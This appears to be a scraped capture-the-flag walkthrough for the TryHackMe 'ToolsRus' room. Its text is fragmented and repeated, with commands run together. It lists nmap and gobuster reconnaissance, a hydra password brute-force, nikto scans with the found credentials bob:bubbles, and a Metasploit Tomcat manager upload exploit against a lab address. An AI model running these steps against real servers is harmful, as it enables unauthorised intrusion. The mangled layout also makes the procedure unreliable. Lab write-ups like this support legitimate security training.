ToolsRus
Room Link: https://tryhackme.com/room/toolsrus
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
TCP/80 - HTTP
Kali
Kali
Kali
Kali
Kali
Msfconsole
Last updated
Room Link: https://tryhackme.com/room/toolsrus
Kali
nmap -A $VICTIMNo other ports found.
Kali
Kali
Kali
Kali
Kali
Kali
Msfconsole
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txthydra -l bob -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top1000.txt $VICTIM http-get /protectednikto -id bob:bubbles -h http://$VICTIM:80/manager/htmlnikto -id bob:bubbles -h http://$VICTIM:1234/manager/html msfconsole use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 10.10.98.194
set RPORT 1234
set HttpUsername bob
set HttpPassword bubbles
run